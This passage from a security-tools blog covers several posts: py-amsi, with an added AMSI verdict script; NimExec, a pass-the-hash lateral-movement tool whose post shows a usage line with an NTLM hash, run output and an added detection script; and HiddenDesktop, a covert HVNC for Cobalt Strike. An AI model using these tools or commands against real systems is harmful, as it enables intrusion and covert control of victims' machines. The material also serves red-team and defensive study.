This naming convention makes it easy to hand the results over to subsequent stages of the <a href="https://www.kitploit.com/search/label/Forensic" target="_blank" title="Forensic">Forensic</a> process.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h3 dir="auto" tabindex="-1">Content Queries</h3> <ul dir="auto"> <li>General information</li> <li>Account and group information</li> <li>Network</li> <li>Process information</li> <li>OS build and hotfixes</li> <li>Persistence</li> <li>Hardware information</li> <li>Encryption information</li> <li>Firewall information</li> <li>Services</li> <li>History</li> <li>SMB queries</li> <li>Remoting queries</li> <li>Registry analysis</li> <li>Log queries</li> <li>Installation of software</li> <li>User activity</li> </ul> <h3 dir="auto" tabindex="-1">Advanced Queries</h3> <ul dir="auto"> <li>Prefetch file information</li> <li>DLL list</li> <li>WMI filters and consumers</li> <li>Named pipes</li> </ul> <h1 dir="auto" tabindex="-1">Usage</h1> <p dir="auto">Run the script from a PowerShell console with administrative privileges; the results are saved in the <a href="https://www.kitploit.com/search/label/Directory" target="_blank" title="directory">directory</a> as a .txt file.</p> <div><pre><code>PS> ./douglas.ps1<br /></code></pre></div> <h1 dir="auto" tabindex="-1">Advanced usage</h1> <div><pre><code>PS> ./douglas.ps1 -a<br /></code></pre></div> <p dir="auto" style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/a/AVvXsEhffHE0HFDOlGVEmFfvyXXQPby69cCQHjNY9yF1NQ_wvp6qyEviF0ZmuhDx3fFS_jrhGAZGM52ClA-imLbpzox_M_QkcnugEiawyBnT8c0F4b8YOOStwOT9KuDeNMCJxK1wh4ALhUsYd6a66gtw4KhJ03bywBWBx9HPt3wnf6P1TLkhjiM5jdbzv44r3Z9J"><img alt="" border="0" height="374" id="BLOGGER_PHOTO_ID_7308982540211377170" src="https://blogger.googleusercontent.com/img/a/AVvXsEhffHE0HFDOlGVEmFfvyXXQPby69cCQHjNY9yF1NQ_wvp6qyEviF0ZmuhDx3fFS_jrhGAZGM52ClA-imLbpzox_M_QkcnugEiawyBnT8c0F4b8YOOStwOT9KuDeNMCJxK1wh4ALhUsYd6a66gtw4KhJ03bywBWBx9HPt3wnf6P1TLkhjiM5jdbzv44r3Z9J=w640-h374" width="640" /></a></p> <div><br /></div><div><h1 dir="auto" tabindex="-1">Video</h1><p dir="auto" style="text-align: center;"><iframe allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen="" frameborder="0" height="315" src="https://www.youtube.com/embed/8KVeNvA6M0s?si=qtR0JWWC88p-DpBm" title="YouTube video player" width="560"></iframe></p></div><div><br /></div><br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/emrekybs/Douglas-042" rel="nofollow" target="_blank" title="Download Douglas-042">Download Douglas-042</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-20618784505919406182023-12-10T08:30:00.001-03:002023-12-10T08:30:00.133-03:00Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB9D-cT44KnDO69VmfDyb18zF51HFNVnpqyu0mCAT6K6CjgtgcJeptJIy5UXl1s7R_z9CZx5YIVh6Ch2qztAST46sDkkwrytivc7lUrQecETGulxpno26zBVYEK5An44SDyyOPUMdGTdRzR_ifqX4RChZJGEfb89t0hSBm6kZeXcZ4TBtUr5j3as1JCL8Y/s1792/Py-Amsi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" 
height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhB9D-cT44KnDO69VmfDyb18zF51HFNVnpqyu0mCAT6K6CjgtgcJeptJIy5UXl1s7R_z9CZx5YIVh6Ch2qztAST46sDkkwrytivc7lUrQecETGulxpno26zBVYEK5An44SDyyOPUMdGTdRzR_ifqX4RChZJGEfb89t0hSBm6kZeXcZ4TBtUr5j3as1JCL8Y/w640-h366/Py-Amsi.png" width="640" /></a></div><p><br /></p> <p dir="auto">py-amsi is a <a href="https://www.kitploit.com/search/label/Library" target="_blank" title="library">library</a> that scans strings or files for <a href="https://www.kitploit.com/search/label/Malware" target="_blank" title="malware">malware</a> using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the <a href="https://www.kitploit.com/search/label/Antivirus" target="_blank" title="antivirus">antivirus</a> installed on the system to analyse a file/string. AMSI is not tied to <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. 
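</p> <p dir="auto">Both scan functions return the dictionary shown in the Usage section below, and its <code>Risk Level</code> is the raw <code>AMSI_RESULT</code> value listed in the table further down. The following Python is an added example, not part of py-amsi, showing how to turn that value into a verdict. AMSI documents the result as ranges rather than as the five named values alone: 1 to 32767 is a provider-specific risk estimate, 16384 to 20479 means an administrator policy blocked the content, and anything at or above 32768 is malware (this is what the SDK's <code>AmsiResultIsMalware</code> macro checks), so comparing for equality with the table's values would miss detections. The example also wraps the scan so that a platform without AMSI reports "unscanned" rather than looking clean.</p>

```python
"""Acting on py-amsi results (added example; not part of py-amsi).

Amsi.scan_file / Amsi.scan_string return a dict whose 'Risk Level' is the raw
AMSI_RESULT value.  amsi.h names five values, but the documented semantics are
ranges: 1..32767 is a provider-specific risk estimate, 16384..20479 means an
administrator policy blocked the content, and anything >= 32768 is malware
(the AmsiResultIsMalware macro).  Equality with 32768 would miss detections.
"""
import sys

# AMSI_RESULT values from amsi.h
AMSI_RESULT_CLEAN = 0
AMSI_RESULT_NOT_DETECTED = 1
AMSI_RESULT_BLOCKED_BY_ADMIN_START = 16384
AMSI_RESULT_BLOCKED_BY_ADMIN_END = 20479
AMSI_RESULT_DETECTED = 32768


def verdict(risk_level):
    """Translate a raw AMSI_RESULT into a verdict string."""
    if not isinstance(risk_level, int) or risk_level < 0:
        return "invalid"                       # missing or out-of-range value
    if risk_level >= AMSI_RESULT_DETECTED:
        return "detected"                      # AmsiResultIsMalware
    if AMSI_RESULT_BLOCKED_BY_ADMIN_START <= risk_level <= AMSI_RESULT_BLOCKED_BY_ADMIN_END:
        return "blocked_by_admin"
    if risk_level == AMSI_RESULT_CLEAN:
        return "clean"
    # 1..16383 and 20480..32767: a risk estimate below the malware threshold.
    return "not_detected"


def should_block(risk_level):
    """Fail closed: allow only results AMSI itself calls clean or not detected."""
    return verdict(risk_level) not in ("clean", "not_detected")


def interpret(result):
    """Reduce a py-amsi result dict to (verdict, block?, provider message)."""
    level = result.get("Risk Level")
    return verdict(level), should_block(level), result.get("Message", "")


def scan_text(sample, name="sample"):
    """Scan a string through py-amsi where AMSI exists.

    A scan that could not run is reported as 'unscanned', never as clean.
    """
    if sys.platform != "win32":
        return {"available": False, "reason": "AMSI is Windows-only", "verdict": "unscanned"}
    try:
        from pyamsi import Amsi    # imported lazily: the module needs amsi.dll
    except ImportError:
        return {"available": False, "reason": "pyamsi not installed", "verdict": "unscanned"}
    result = Amsi.scan_string(sample, name)
    v, block, message = interpret(result)
    return {"available": True, "verdict": v, "block": block, "message": message, "raw": result}


if __name__ == "__main__":
    print(scan_text("print('hello')", "demo.py"))
```

<p dir="auto">Only <code>scan_text</code> needs Windows and py-amsi; <code>verdict</code>, <code>should_block</code> and <code>interpret</code> are pure functions, which makes the blocking policy easy to unit-test on any platform before it is wired into an upload handler or a script-execution gate.</p> <p dir="auto">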
Read more about the Windows AMSI API <a href="https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" rel="nofollow" target="_blank" title="here">here</a>.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto" tabindex="-1">Installation</h2> <ul dir="auto"> <li> <p dir="auto">Via pip</p> <div><pre><code>pip install pyamsi<br /></code></pre></div> </li> <li> <p dir="auto">Clone repository</p> <div><pre><code>git clone https://github.com/Tomiwa-Ot/py-amsi.git<br />cd py-amsi/<br />python setup.py install</code></pre></div> </li> </ul> <h2 dir="auto" tabindex="-1">Usage</h2> <div><pre><code>from pyamsi import Amsi<br /><br /># Scan a file<br />Amsi.scan_file(file_path, debug=True) # debug is optional and False by default<br /><br /># Scan string<br />Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default<br /><br /># Both functions return a dictionary of the format<br /># {<br /># 'Sample Size' : 68, // The string/file size in bytes<br /># 'Risk Level' : 0, // The risk level as suggested by the 
antivirus<br /># 'Message' : 'File is clean' // Response message<br /># }</code></pre></div> <table> <tbody><tr> <th>Risk Level</th> <th>Meaning</th> </tr> <tr> <td>0</td> <td>AMSI_RESULT_CLEAN (File is clean)</td> </tr> <tr> <td>1</td> <td>AMSI_RESULT_NOT_DETECTED (No threat detected)</td> </tr> <tr> <td>16384</td> <td>AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)</td> </tr> <tr> <td>20479</td> <td>AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)</td> </tr> <tr> <td>32768</td> <td>AMSI_RESULT_DETECTED (File is considered malware)</td> </tr> </tbody></table> <h2 dir="auto" tabindex="-1">Docs</h2> <p dir="auto"><a href="https://tomiwa-ot.github.io/py-amsi/index.html" rel="nofollow" target="_blank" title="https://tomiwa-ot.github.io/py-amsi/index.html">https://tomiwa-ot.github.io/py-amsi/index.html</a></p> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/Tomiwa-Ot/py-amsi" rel="nofollow" target="_blank" title="Download Py-Amsi">Download Py-Amsi</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-44125323452681333332023-12-03T08:30:00.004-03:002023-12-03T08:30:00.128-03:00NimExec - Fileless Command Execution For Lateral Movement In Nim<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk1EoP90lrG2ujqtjTqrJL_aW4ZxzE88p1FD7BqJNW4D9glJ1u62AJZhb92LeKyv9k6Y0QQgTrf08Da5HyRKXXt_QZar0aFMWRow793d7NLESQ9enIhUiLuE9_BQEoPzMHWVpx85kRulTOXwkQ-pqeFPDnOQd0TKSL9poYfvo5qidaAA8_9aQCH9jDKHDC/s1792/NimExec.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" data-original-width="1792" height="366" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjk1EoP90lrG2ujqtjTqrJL_aW4ZxzE88p1FD7BqJNW4D9glJ1u62AJZhb92LeKyv9k6Y0QQgTrf08Da5HyRKXXt_QZar0aFMWRow793d7NLESQ9enIhUiLuE9_BQEoPzMHWVpx85kRulTOXwkQ-pqeFPDnOQd0TKSL9poYfvo5qidaAA8_9aQCH9jDKHDC/w640-h366/NimExec.png" width="640" /></a></div><p><br /></p> <p dir="auto">Basically, NimExec is a <a href="https://www.kitploit.com/search/label/Fileless" target="_blank" title="fileless">fileless</a> <a href="https://www.kitploit.com/search/label/Remote%20Command%20Execution" target="_blank" title="remote command execution">remote command execution</a> tool that uses the Service Control Manager Remote Protocol (MS-SCMR). It changes the binary path of a random or given service run by LocalSystem to execute the given command on the target and restores it later, using hand-crafted RPC packets instead of WinAPI calls. It sends these packets over SMB2 and the svcctl named pipe.</p> <p dir="auto">NimExec needs an NTLM hash to authenticate to the target machine and then completes this authentication process with the NTLM <a href="https://www.kitploit.com/search/label/Authentication" target="_blank" title="Authentication">Authentication</a> method over hand-crafted packets.</p> <p dir="auto">Since all required network packets are manually crafted and no operating-system-specific functions are used, NimExec can be used on different operating systems thanks to Nim's cross-compilation support.</p> <p dir="auto">This project was inspired by <a href="https://github.com/juliourena/SharpNoPSExec" rel="nofollow" target="_blank" title="Julio's SharpNoPSExec">Julio's SharpNoPSExec</a> tool. You can think of NimExec as a cross-compilable version of SharpNoPSExec with built-in Pass-the-Hash support. 
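</p> <p dir="auto">From the defender's side, the behaviour just described is also what makes it detectable. On the target, the change and the later restore are two writes to <code>HKLM\SYSTEM\CurrentControlSet\Services\&lt;service&gt;\ImagePath</code> by services.exe a short time apart, and registry value-set telemetry such as Sysmon Event ID 13 records both; the <code>ERROR_SERVICE_REQUEST_TIMEOUT</code> (1053) in the output further down is the SCM giving up on a binary that never reported service status, which the target logs as a service start timeout (System log Event ID 7009) for the same service. The script below is an added example (not part of NimExec) that runs that logic over a few constructed events modelled on the Sysmon fields; the service name, original path and command in the sample are the ones shown in this post's output, and everything else in the sample is made up.</p>

```python
r"""Detecting the service-path swap NimExec performs (added example; not part of NimExec).

On the target, changing a LocalSystem service's binary path and restoring it a
moment later means two writes to
HKLM\SYSTEM\CurrentControlSet\Services\<svc>\ImagePath by services.exe, which
registry value-set telemetry such as Sysmon Event ID 13 records.  The events
below are constructed to resemble those records (field names from Sysmon; the
service, old path and command are the ones shown in the post's output).
"""
from datetime import datetime
import re

IMAGEPATH_RE = re.compile(r"\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)

# Fragments that should not appear in a LocalSystem service's binary path.
SUSPICIOUS_FRAGMENTS = ("cmd.exe /c", "cmd /c", "powershell", "\\users\\",
                        "\\temp\\", "%comspec%", "rundll32", " > ")

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    {"UtcTime": "2023-12-03 10:15:01.120", "Image": r"C:\Windows\system32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\LxpSvc\ImagePath",
     "Details": r'cmd.exe /c "echo test > C:\Users\Public\test.txt"'},
    {"UtcTime": "2023-12-03 10:15:31.480", "Image": r"C:\Windows\system32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\LxpSvc\ImagePath",
     "Details": r"C:\Windows\system32\svchost.exe -k netsvcs"},
    # A benign installer registering its own service: one write, sane path.
    {"UtcTime": "2023-12-03 11:02:10.000", "Image": r"C:\Windows\system32\services.exe",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\ExampleAgent\ImagePath",
     "Details": r'"C:\Program Files\Example\agent.exe"'},
]


def parse_time(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S.%f")


def service_name(target_object):
    """Service name if the key is a service's ImagePath value, else None."""
    m = IMAGEPATH_RE.search(target_object)
    return m.group(1) if m else None


def is_suspicious_path(value):
    v = value.lower()
    return any(frag in v for frag in SUSPICIOUS_FRAGMENTS)


def find_imagepath_tampering(events, window_seconds=120):
    """Alert on ImagePath writes that look like a command rather than a service
    binary.  A following write to the same key inside the window is the restore
    step of a change-execute-restore sequence and raises the severity."""
    writes = {}
    for e in events:
        svc = service_name(e["TargetObject"])
        if svc:
            writes.setdefault(svc, []).append((parse_time(e["UtcTime"]), e["Details"], e["Image"]))
    alerts = []
    for svc, entries in writes.items():
        entries.sort(key=lambda x: x[0])
        for i, (t, value, image) in enumerate(entries):
            if not is_suspicious_path(value):
                continue
            alert = {"service": svc, "time": t.isoformat(sep=" "), "payload": value,
                     "writer": image, "restored_to": None, "severity": "medium"}
            if i + 1 < len(entries):
                t2, value2, _ = entries[i + 1]
                if (t2 - t).total_seconds() <= window_seconds and not is_suspicious_path(value2):
                    alert["restored_to"] = value2
                    alert["severity"] = "high"
            alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in find_imagepath_tampering(SAMPLE_EVENTS):
        print(a)
```

<p dir="auto">In production the event list would come from the Sysmon operational log or a SIEM query filtered to value-set events under the Services key; the fragment list is deliberately small and should be extended from your own baseline of legitimate ImagePath values, since a mature detection keys on deviation from that baseline rather than on substrings alone.</p> <p dir="auto">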
Also, I learned the required network packet structures from <a href="https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1" rel="nofollow" target="_blank" title="Kevin Robertson's Invoke-SMBExec Script">Kevin Robertson's Invoke-SMBExec Script</a>.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto" tabindex="-1">Compilation</h1> <div><pre><code>nim c -d:release --gc:markAndSweep -o:NimExec.exe Main.nim<br /></code></pre></div> <p dir="auto">The above command uses a different Garbage Collector because the default garbage collector in Nim is throwing some SIGSEGV errors during the service searching process.</p> <p dir="auto">Also, you can install the required Nim modules via Nimble with the following command:</p> <div><pre><code>nimble install ptr_math nimcrypto hostname<br /></code></pre></div> <h1 dir="auto" tabindex="-1">Usage</h1> <div><pre><code>test@ubuntu:~/Desktop/NimExec$ ./NimExec -u testuser -d TESTLABS -h 123abcbde966780cef8d9ec24523acac -t 10.200.2.2 -c 'cmd.exe /c "echo test > C:\Users\Public\test.txt"' -v<br /> <br /> _..._ <br /> .-'_..._''. <br /> _..._ .--. __ __ ___ __.....__ __.....__ .' .' '.\ <br /> .' '. |__|| |/ `.' `. .-'' '. .-'' '. / .' <br />. .-. ..--.| .-. .-. ' / .-''"'-. `. / .-''"'-. `. . ' <br />| ' ' || || | | | | |/ /________\ \ ____ _____/ /________\ \| | <br />| | | || || | | | | || |`. \ .' /| || | <br />| | | || || | | | | |\ .--- ----------' `. `' .' \ .-------------'. ' <br />| | | || || | | | | | \ '-.____...---. '. .' \ '-.____...---. \ '. . <br />| | | ||__||__| |__| |__| `. .' .' `. `. .' '. `._____.-'/ <br />| | | | `''-...... -' .' .'`. `. `''-...... -' `-.______ / <br />| | | | .' / `. `. 
` <br />'--' '--' '----' '----' <br /><br /> @R0h1rr1m <br /><br /><br />[+] Connected to 10.200.2.2:445<br />[+] NTLM Authentication with Hash is succesfull!<br />[+] Connected to IPC Share of target!<br />[+] Opened a handle for svcctl pipe!<br />[+] Bound to the RPC Interface!<br />[+] RPC Binding is acknowledged!<br />[+] SCManager handle is obtained!<br />[+] Number of obtained services: 265<br />[+] Selected service is LxpSvc<br />[+] Service: LxpSvc is opened!<br />[+] Previous Service Path is: C:\Windows\system32\svchost.exe -k netsvcs<br />[+] Service config is changed!<br />[!] StartServiceW Return Value: 1053 (ERROR_SERVICE_REQUEST_TIMEOUT)<br />[+] Service start request is sent!<br />[+] Service config is restored!<br />[+] Service handle is closed!<br />[+] Service Manager handle is closed!<br />[+] SMB is closed!<br />[+] Tree is disconnected!<br />[+] Session logoff!<br /></code></pre></div> <p dir="auto">It's tested against Windows 10&11, Windows Server 16&19&22 from Ubuntu 20.04 and <a href="https://www.kitploit.com/search/label/Windows%2010" target="_blank" title="Windows 10">Windows 10</a> machines.</p> <h1 dir="auto" tabindex="-1">Command Line Parameters</h1> <div><pre><code> -v | --verbose Enable more verbose output.<br /> -u | --username <Username> Username for NTLM Authentication.*<br /> -h | --hash <NTLM Hash> NTLM password hash for NTLM Authentication.*<br /> -t | --target <Target> Lateral movement target.*<br /> -c | --command <Command> Command to execute.*<br /> -d | --domain <Domain> Domain name for NTLM Authentication.<br /> -s | --service <Service Name> Name of the service instead of a random one.<br /> --help Show the help message.<br /><br /></code></pre></div> <h1 dir="auto" tabindex="-1">References</h1> <ul dir="auto"> <li><a href="https://github.com/juliourena/SharpNoPSExec" rel="nofollow" target="_blank" title="https://github.com/juliourena/SharpNoPSExec">https://github.com/juliourena/SharpNoPSExec</a></li> <li><a 
href="https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1" rel="nofollow" target="_blank" title="https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1">https://github.com/Kevin-Robertson/Invoke-TheHash/blob/master/Invoke-SMBExec.ps1</a></li> <li><a href="https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SCMR/%5bMS-SCMR%5d.pdf" rel="nofollow" target="_blank" title="https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SCMR/%5bMS-SCMR%5d.pdf">https://winprotocoldoc.blob.core.windows.net/productionwindowsarchives/MS-SCMR/%5bMS-SCMR%5d.pdf</a></li> <li><a href="https://github.com/jborean93/pypsexec/tree/master" rel="nofollow" target="_blank" title="https://github.com/jborean93/pypsexec/tree/master">https://github.com/jborean93/pypsexec/tree/master</a></li> <li><a href="https://www.x86matthew.com/view_post?id=create_svc_rpc" rel="nofollow" target="_blank" title="https://www.x86matthew.com/view_post?id=create_svc_rpc">https://www.x86matthew.com/view_post?id=create_svc_rpc</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/frkngksl/NimExec" rel="nofollow" target="_blank" title="Download NimExec">Download NimExec</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-41891529238103955432023-11-29T08:30:00.002-03:002023-11-29T08:30:00.137-03:00HiddenDesktop - HVNC For Cobalt Strike<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHFGlHzYZvIAn9m0AXdjHfHhC3RvkGIpHRw4JrhMKicOnuYHHFwQms0GcJi4-jUNy4IZccs_2gyhApt0QETeVenvtqYayjBazLplWPPZa9jcHz9MNgRO9RvlX9kHXkz0MbmcdF450jFhR0CKVRRuX443XBKUnVOQC_Jzih_9AlIe5o8Om6l5LnMwYVxtiA/s1792/HiddenDesktop.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="1024" 
data-original-width="1792" height="366" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHFGlHzYZvIAn9m0AXdjHfHhC3RvkGIpHRw4JrhMKicOnuYHHFwQms0GcJi4-jUNy4IZccs_2gyhApt0QETeVenvtqYayjBazLplWPPZa9jcHz9MNgRO9RvlX9kHXkz0MbmcdF450jFhR0CKVRRuX443XBKUnVOQC_Jzih_9AlIe5o8Om6l5LnMwYVxtiA/w640-h366/HiddenDesktop.png" width="640" /></a></div><p><br /></p> <p dir="auto">Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a <a href="https://www.kitploit.com/search/label/Remote%20Desktop" target="_blank" title="remote desktop">remote desktop</a> session without the user knowing. The VNC protocol is not involved, but the result is a similar experience. This <a href="https://www.kitploit.com/search/label/Cobalt%20Strike" target="_blank" title="Cobalt Strike">Cobalt Strike</a> BOF implementation was created as an alternative to TinyNuke/forks that are written in C++.</p> <p dir="auto">There are four components of Hidden Desktop:</p> <ol dir="auto"> <li> <p dir="auto">BOF initializer: Small program responsible for injecting the HVNC code into the Beacon process.</p> </li> <li> <p dir="auto">HVNC shellcode: PIC implementation of TinyNuke HVNC.</p> </li> <li> <p dir="auto">Server and operator UI: Server that listens for connections from the HVNC shellcode and a UI that allows the operator to interact with the remote desktop. Currently only supports Windows.</p> </li> <li> <p dir="auto">Application launcher BOFs: Set of Beacon Object Files that execute applications in the new desktop.</p> </li> </ol><span><a name='more'></a></span><div><br /></div> <h2 dir="auto" tabindex="-1">Usage</h2> <p dir="auto">Download the <a href="https://github.com/WKL-Sec/HiddenDesktop/releases" rel="nofollow" target="_blank" title="latest release">latest release</a> or compile yourself using <code>make</code>. Start the HVNC server on a Windows machine accessible from the teamserver. 
You can then execute the client with:</p> <div><pre><code>HiddenDesktop &lt;server&gt; &lt;port&gt;
</code></pre></div> <p dir="auto">You should see a new blank window on the server machine. The BOF does not execute any applications by default. You can use the application launcher BOFs to execute common programs on the new desktop:</p> <div><pre><code>hd-launch-edge
hd-launch-explorer
hd-launch-run
hd-launch-cmd
hd-launch-chrome
</code></pre></div> <p dir="auto">You can also launch programs through File Explorer using the mouse and keyboard. Other applications can be executed using the following command:</p> <div><pre><code>hd-launch &lt;command&gt; [args]
</code></pre></div> <h2 dir="auto" tabindex="-1">Demo</h2> <p dir="auto">Demo video: <a href="https://user-images.githubusercontent.com/9327972/241064072-82f73393-ba44-42b4-8eae-b36b7181fac0.mp4" rel="nofollow" target="_blank" title="Hidden.Desktop.mp4">Hidden.Desktop.mp4</a></p> <h2 dir="auto" tabindex="-1">Implementation Details</h2> <ol dir="auto"> <li>The Aggressor script generates random pipe and desktop names. These are passed to the BOF initializer as arguments. 
The desktop name is stored in Cobalt Strike (CS) preferences at execution time and is used by the application launcher BOFs. HVNC traffic is forwarded back to the team server using <code>rportfwd</code>. Status updates are sent back to Beacon through a named pipe.</li> <li>The BOF initializer starts by resolving the required modules and functions. Arguments from the Aggressor script are resolved. A pointer to a structure containing the arguments and function addresses is passed to the <code>InputHandler</code> function in the HVNC shellcode. It uses <code>BeaconInjectProcess</code> to execute the shellcode, meaning the behavior can be customized in a <a href="https://www.kitploit.com/search/label/Malleable%20C2" target="_blank" title="Malleable C2">Malleable C2</a> profile or with process injection BOFs. Injecting the shellcode this way lets the BOF exit while the HVNC shellcode continues running. You could modify Hidden Desktop to target remote processes, but this is not currently supported.</li> <li><code>InputHandler</code> creates a new named pipe for Beacon to connect to. Once a connection has been established, the specified desktop is opened (<code>OpenDesktopA</code>) or created (<code>CreateDesktopA</code>). A new socket is established through a reverse <a href="https://www.kitploit.com/search/label/Port%20Forward" target="_blank" title="port forward">port forward</a> (<code>rportfwd</code>) to the HVNC server. The input handler creates a new thread for the <code>DesktopHandler</code> function described below, and then itself receives mouse and keyboard input from the HVNC server and forwards it to the desktop.</li> <li><code>DesktopHandler</code> establishes an additional socket connection to the HVNC server through the reverse port forward. 
This thread will monitor windows for changes and forward them to the HVNC server.</li> </ol> <h2 dir="auto" tabindex="-1">Compatibility</h2> <p dir="auto">The HiddenDesktop BOF was tested using <a href="https://github.com/WKL-Sec/HiddenDesktop/blob/main/example.profile" rel="nofollow" target="_blank" title="example.profile">example.profile</a> on the following Windows versions/architectures:</p> <ul dir="auto"> <li>Windows Server 2022 x64</li> <li>Windows Server 2016 x64</li> <li>Windows Server 2012 R2 x64</li> <li>Windows Server 2008 x86</li> <li>Windows 7 SP1 x64</li> </ul> <h2 dir="auto" tabindex="-1">Known Issues</h2> <ul dir="auto"> <li>The start menu is not functional.</li> </ul> <h2 dir="auto" tabindex="-1">Credits</h2> <ul dir="auto"> <li>Heavily based on <a href="https://github.com/rossja/TinyNuke" rel="nofollow" target="_blank" title="TinyNuke">TinyNuke</a></li> <li>Included improvements/fixes from <a href="https://github.com/Meltedd/HVNC" rel="nofollow" target="_blank" title="Meltedd/HVNC">Meltedd/HVNC</a></li> <li>Uses Beacon job interface and project structure from <a href="https://github.com/SolomonSklash/netntlm" rel="nofollow" target="_blank" title="SecIdiot/netntlm">SecIdiot/netntlm</a></li> </ul> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/WKL-Sec/HiddenDesktop" rel="nofollow" target="_blank" title="Download HiddenDesktop">Download HiddenDesktop</a></span></b></div><h1>Red Canary Mac Monitor - An Advanced, Stand-Alone System Monitoring Tool Tailor-Made For macOS Security Research</h1><p>Published 2023-11-09</p><div class="separator" style="clear: both; text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwYvf3QRe0-LaXdRdYYfezwTNMH5t_ZbQJwFOYcVyYIIyr_GU9-MKgqFtN46qOW0JO6-iUeP0XFaSx8TNTqdbNiYG5Sc6pP9MXaQuPpFL81fEv4qeAc8IDc5envHd93cBKa4J6Wq6vBaGGXSNJcUTPQZzES7uxjXew8oGZ1ReveTAKbLa8VTq4qGCN0AXc/s6104/mac-monitor_1_FeatureSummary.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="3416" data-original-width="6104" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwYvf3QRe0-LaXdRdYYfezwTNMH5t_ZbQJwFOYcVyYIIyr_GU9-MKgqFtN46qOW0JO6-iUeP0XFaSx8TNTqdbNiYG5Sc6pP9MXaQuPpFL81fEv4qeAc8IDc5envHd93cBKa4J6Wq6vBaGGXSNJcUTPQZzES7uxjXew8oGZ1ReveTAKbLa8VTq4qGCN0AXc/w640-h358/mac-monitor_1_FeatureSummary.png" width="640" /></a></div><div><br /></div> <p dir="auto">Red Canary Mac Monitor is an <strong>advanced, stand-alone system monitoring tool tailor-made for macOS security research, malware triage, and system troubleshooting</strong>. Harnessing Apple Endpoint Security (ES), it collects and enriches system events, displaying them graphically, with an expansive feature set designed to surface only the events that are relevant to you. The telemetry collected includes process, interprocess, and file events in addition to rich metadata, allowing users to contextualize events and tell a story with ease. With an intuitive interface and a rich set of analysis features, Red Canary Mac Monitor was designed for a wide range of skill levels and backgrounds to detect macOS threats that would otherwise go unnoticed. 
As part of Red Canary’s commitment to the research community, the Mac Monitor distribution package is available to download for free.</p> <h2 dir="auto" tabindex="-1">Requirements</h2> <ul dir="auto"> <li>Processor: We recommend an <code>Apple Silicon</code> machine, but <code>Intel</code> works too!</li> <li>System memory: <code>4GB+</code> is recommended</li> <li>macOS version: <code>13.1+</code> (Ventura)</li> </ul> <h2 dir="auto" tabindex="-1">How can I install this thing?</h2> <blockquote> <p dir="auto"><strong>Homebrew?</strong> <code>brew install --cask red-canary-mac-monitor</code></p> </blockquote> <ul dir="auto"> <li>Go to the releases section and download the latest installer: <a href="https://github.com/redcanaryco/mac-monitor/releases" rel="nofollow" target="_blank" title="https://github.com/redcanaryco/mac-monitor/releases">https://github.com/redcanaryco/mac-monitor/releases</a></li> <li>Open the app: <code>Red Canary Mac Monitor.app</code></li> <li>You'll be prompted to "Open System Settings" to "Allow" the System Extension.</li> <li>Next, System Settings will automatically open to <code>Full Disk Access</code> -- you'll need to flip the switch to enable this for the <code>Red Canary Security Extension</code>. Full Disk Access is a <a 